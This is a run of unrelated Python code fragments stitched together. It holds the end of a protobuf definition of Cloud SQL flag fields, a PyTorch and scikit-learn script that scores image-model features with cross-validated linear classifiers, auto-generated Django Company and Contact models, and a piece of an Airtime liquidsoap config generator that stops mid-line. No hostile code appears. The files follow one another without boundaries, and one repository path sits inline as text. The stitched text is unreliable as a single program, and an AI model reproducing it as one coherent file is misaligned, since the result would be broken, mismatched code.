""" name = proto.Field( proto.STRING, number=1, ) type_ = proto.Field( proto.ENUM, number=2, enum='SqlFlagType', ) applies_to = proto.RepeatedField( proto.ENUM, number=3, enum=cloud_sql_resources.SqlDatabaseVersion, ) allowed_string_values = proto.RepeatedField( proto.STRING, number=4, ) min_value = proto.Field( proto.MESSAGE, number=5, message=wrappers_pb2.Int64Value, ) max_value = proto.Field( proto.MESSAGE, number=6, message=wrappers_pb2.Int64Value, ) requires_restart = proto.Field( proto.MESSAGE, number=7, message=wrappers_pb2.BoolValue, ) kind = proto.Field( proto.STRING, number=8, ) in_beta = proto.Field( proto.MESSAGE, number=9, message=wrappers_pb2.BoolValue, ) allowed_int_values = proto.RepeatedField( proto.INT64, number=10, ) __all__ = tuple(sorted(__protobuf__.manifest)) 1-10 #!/usr/bin/env python # coding: utf-8 import torch import torch.nn as nn import torch.nn.functional as F from torchvision import datasets, models, transforms from torch.utils.data import DataLoader, ConcatDataset, Subset import os import inspect import argparse from tqdm import tqdm from pathlib import Path from collections import OrderedDict from sklearn.linear_model import Ridge from sklearn.linear_model import LogisticRegression as LogReg from sklearn.metrics import confusion_matrix, precision_recall_curve from sklearn.utils._testing import ignore_warnings from sklearn.exceptions import ConvergenceWarning from sklearn.preprocessing import StandardScaler from sklearn.metrics import r2_score from sklearn.model_selection import KFold import numpy as np import model_utils from datasets import Flowers, Caltech101, FacesInTheWild300W, CelebA, LeedsSportsPose dataset_info = { 'cifar10': { 'class': datasets.CIFAR10, 'dir': 'CIFAR10', 'num_classes': 10, 'splits': ['train', 'train', 'test'], 'split_size': 0.8, 'mode': 'classification' }, 'flowers': { 'class': Flowers, 'dir': 'Flowers', 'num_classes': 102, 'splits': ['train', 'val', 'test'], 'split_size': 0.5, 'mode': 'classification' }, 'caltech101': { 'class': Caltech101, 'dir': 'Caltech101', 'num_classes': 102, 'splits': ['train', 'train', 'test'], 'split_size': 0.5, 'mode': 'classification' }, '300w': { 'class': FacesInTheWild300W, 'dir': '300W', 'num_classes': None, 'splits': ['train', 'val', 'test'], 'split_size': 0.5, 'mode': 'regression' }, 'celeba': { 'class': CelebA, 'dir': 'CelebA', 'num_classes': 40, 'splits': ['train', 'val', 'test'], 'split_size': 0.5, 'target_type': 'landmarks', 'mode': 'regression' }, 'leeds_sports_pose': { 'class': LeedsSportsPose, 'dir': 'LeedsSportsPose', 'num_classes': None, 'splits': ['train', 'train', 'test'], 'split_size': 0.8, 'mode': 'regression' } } class LogisticRegression(nn.Module): def __init__(self, input_dim, num_features, num_classes, multilabel, metric): super().__init__() self.input_dim = input_dim self.num_classes = num_classes self.multilabel = multilabel self.metric = metric self.clf = LogReg(solver='lbfgs', multi_class='multinomial', warm_start=True) print('Logistic regression:') print(f'\t solver = L-BFGS') print(f"\t classes = {self.num_classes}") print(f"\t multilabel = {self.multilabel}") print(f"\t metric = {self.metric}") def set_params(self, d): self.clf.set_params(**d) @ignore_warnings(category=ConvergenceWarning) def fit(self, X_train, y_train, X_test, y_test): if not self.multilabel: self.clf = self.clf.fit(X_train, y_train) test_acc = self.clf.score(X_test, y_test) pred_test = self.clf.predict(X_test) #Get the confusion matrix cm = confusion_matrix(y_test, pred_test) if self.metric == 'mean 
per-class accuracy': _cm = cm.diagonal() / cm.sum(axis=1) test_acc = _cm.mean() return test_acc, cm else: per_class_acc = [] for cls in range(self.num_classes): self.clf.fit(X_train, y_train[:, cls]) acc = self.clf.score(X_test, y_test[:, cls]) per_class_acc.append(acc) test_acc = np.mean(per_class_acc) return test_acc, per_class_acc class LinearRegression(nn.Module): def __init__(self, input_dim, num_features): super().__init__() self.input_dim = input_dim self.num_features = num_features self.clf = Ridge() def set_params(self, d): d['alpha'] = d['C'] del d['C'] self.clf.set_params(**d) @ignore_warnings(category=ConvergenceWarning) def fit(self, X_train, y_train, X_test, y_test, metric='r2'): self.clf = self.clf.fit(X_train, y_train) r2 = self.clf.score(X_test, y_test) mse_loss = F.mse_loss(torch.from_numpy(self.clf.predict(X_test)), torch.from_numpy(y_test)).item() if metric =='mse': return mse_loss, None elif metric == 'r2': return r2, None class CVTester(): def __init__(self, mode, model, trainval, test, device, num_classes, num_features, k=5, batch_size=256, feature_dim=2048, wd_range=None, debug=False): self.mode = mode self.model = model self.trainval = trainval self.test = test self.kf = KFold(n_splits=k, shuffle=True) self.batch_size = batch_size self.device = device self.num_classes = num_classes self.feature_dim = feature_dim self.debug = debug self.best_params = {} self.X_trainval_feature, self.y_trainval = self._inference(self.trainval, self.model, 'trainval') self.X_test_feature, self.y_test = self._inference(self.test, self.model, 'test') multilabel = (mode == 'multi-label classification') metric = 'mean per-class accuracy' if bool( sum([isinstance(trainval, d) for d in [Caltech101, Flowers]]) ) else 'accuracy' if wd_range is None: self.wd_range = torch.logspace(-6, 5, 45) else: self.wd_range = wd_range if 'classification' in self.mode: self.classifier = LogisticRegression(self.feature_dim, num_features, self.num_classes, multilabel, metric).to(self.device) elif self.mode == 'regression': self.classifier = LinearRegression(self.feature_dim, num_features).to(self.device) def _inference(self, data_set, model, split): model.eval() feature_vector = [] labels_vector = [] loader = DataLoader(data_set, batch_size=self.batch_size, shuffle=True) for i, data in enumerate(tqdm(loader, desc=f'Computing features for {split} set')): if self.debug and i >= 100: print('DEBUG: stopping early.') break batch_x, batch_y = data batch_x = batch_x.to(self.device) labels_vector.extend(np.array(batch_y)) features = model(batch_x) feature_vector.extend(features.cpu().detach().numpy()) feature_vector = np.array(feature_vector) if 'classification' in self.mode: labels_vector = np.array(labels_vector, dtype=int) else: labels_vector = np.array(labels_vector) return feature_vector, labels_vector def validate(self): best_score = -np.inf for wd in tqdm(self.wd_range, desc='Cross-validating'): C = 1. 
/ wd.item() self.classifier.set_params({'C': C}) cv_scores = [] for i, (train, val) in enumerate(self.kf.split(self.X_trainval_feature)): test_score, _ = self.classifier.fit(self.X_trainval_feature[train], self.y_trainval[train], self.X_trainval_feature[val], self.y_trainval[val]) cv_scores.append(test_score) score = np.mean(cv_scores) #print(f'{C}: {score}, {cv_scores}') if score > best_score: best_score = score self.best_params['C'] = C def evaluate(self): print(f"Best hyperparameters {self.best_params}") self.classifier.set_params({'C': self.best_params['C']}) test_score, per_class_acc = self.classifier.fit(self.X_trainval_feature, self.y_trainval, self.X_test_feature, self.y_test) return test_score, per_class_acc def get_dataset(args, c, d, s, t): if d == 'CelebA': return c(os.path.join(args.data_root, d), split=s, target_type=dataset_info[args.dataset]['target_type'], transform=t, download=True) elif d == 'CIFAR10': return c(os.path.join(args.data_root, d), train=s == 'train', transform=t, download=True) else: if 'split' in inspect.getfullargspec(c.__init__)[0]: if s == 'valid': try: return c(os.path.join(args.data_root, d), split=s, transform=t) except: return c(os.path.join(args.data_root, d), split='val', transform=t) else: return c(os.path.join(args.data_root, d), split=s, transform=t) else: return c(os.path.join(args.data_root, d), train=s == 'train', transform=t) def prepare_data(args, norm): transform = transforms.Compose([ transforms.Resize(args.resize), transforms.CenterCrop(args.crop_size), transforms.ToTensor(), transforms.Normalize(*norm) ]) if dataset_info[args.dataset]['splits'][1] == 'val': train_dataset = get_dataset(args, dataset_info[args.dataset]['class'], dataset_info[args.dataset]['dir'], 'train', transform) val_dataset = get_dataset(args, dataset_info[args.dataset]['class'], dataset_info[args.dataset]['dir'], 'valid', transform) trainval = ConcatDataset([train_dataset, val_dataset]) elif dataset_info[args.dataset]['splits'][1] == 'train': trainval = get_dataset(args, dataset_info[args.dataset]['class'], dataset_info[args.dataset]['dir'], 'train', transform) test = get_dataset(args, dataset_info[args.dataset]['class'], dataset_info[args.dataset]['dir'], 'test', transform) return trainval, test if __name__ == "__main__": parser = argparse.ArgumentParser() parser.add_argument('--model', default='default', type=str, metavar='M', help='model to evaluate invariance of (random/supervised/default/ventral/dorsal)') parser.add_argument('--fuse-mode', default='cat', type=str, metavar='F', help='method of fusing multiple representations (cat/add/mean)') parser.add_argument('--dataset', default='cifar10', type=str, metavar='DS', help='dataset to evaluate on') parser.add_argument('--cv-folds', default=5, type=int, help='number of cross-validation folds (default: 5)') parser.add_argument('--device', default='cuda:0', type=str, metavar='D', help='GPU device') parser.add_argument('--feature-layer', default='backbone', type=str, metavar='F', help='layer to extract features from (default: backbone)') parser.add_argument('--batch-size', default=64, type=int, metavar='N', help='mini-batch size') parser.add_argument('--resize', default=224, type=int, metavar='R', help='resize') parser.add_argument('--crop-size', default=224, type=int, metavar='C', help='crop size') parser.add_argument('--ckpt-dir', default='./models/', type=Path, metavar='DIR', help='path to checkpoint directory') parser.add_argument('--results-dir', default='./results', type=Path, metavar='DIR', help='path to results 
directory') parser.add_argument('--data-root', default='../data/', type=Path, metavar='DIR', help='data root directory') parser.add_argument('--quick', dest='quick', action='store_true') parser.set_defaults(quick=False) args = parser.parse_args() args.dataset = args.dataset.lower() trainval, test = prepare_data(args, norm=model_utils.imagenet_mean_std) models_list = [model_utils.load_model(model_name, args) for model_name in args.model.split('+')] model = model_utils.ModelCombiner(args.fuse_mode, *models_list) model.to(args.device) c = 2 if 'w3' in args.model else args.model.count('+') wd_range = torch.logspace(-6 + 2 * c, 5 + 2 * c, 45) print(f'Searching regularisation parameter in {wd_range}') clf = CVTester(dataset_info[args.dataset]['mode'], model, trainval, test, device=args.device, batch_size=args.batch_size, k=args.cv_folds, num_classes=dataset_info[args.dataset]['num_classes'], num_features=len(models_list), wd_range=wd_range, debug=args.quick) clf.validate() test_acc, per_class_acc = clf.evaluate() print(f'{args.model} on {args.dataset}: {test_acc:.2f}') torch.save(test_acc, open(f'{args.results_dir}/{args.model}_{args.dataset}.pth', 'wb')) # This is an auto-generated Django model module. # You'll have to do the following manually to clean this up: # * Rearrange models' order # * Make sure each model has one field with primary_key=True # * Make sure each ForeignKey has `on_delete` set to the desired behavior. # * Remove `managed = False` lines if you wish to allow Django to create, modify, and delete the table # Feel free to rename the models, but don't rename db_table values or field names. from __future__ import unicode_literals from django.db import models class Company(models.Model): id = models.AutoField(primary_key=True) name = models.CharField(max_length=100, unique=True) class Meta: db_table = 'company' def __unicode__(self): return "{name}".format( name = self.name) class Contact(models.Model): name = models.CharField(max_length=150, unique=True) company = models.ForeignKey('Company') note = models.CharField(max_length=250) class Meta: db_table = 'contact' def __unicode__(self): return "{name} @ {company}".format( name = self.name, company = self.company.name) krattai/AEBLinterfaces/ATS_VM/python_apps/pypo/liquidsoap_scripts/generate_liquidsoap_cfg.py import logging import sys import time import traceback from api_clients.api_client import AirtimeApiClient def generate_liquidsoap_config(ss): data = ss['msg'] fh = open('/etc/airtime/liquidsoap.cfg', 'w') fh.write("################################################\n") fh.write("# THIS FILE IS AUTO GENERATED. DO NOT CHANGE!! #\n") fh.write("################################################\n") for d in data: key = d['keyname'] str_buffer = d[u'keyname'] + " = " if d[u'type'] == 'string': val = '"%s"' % d['value'] else: val = d[u'value'] val = val if len(val) > 0 else "0" str_buffer = "%s = %s\n" % (key, val) fh.write(str_buffer.encode('utf-8')) fh.write('log_file = "/var/log/airtime/pypo-liquidsoap/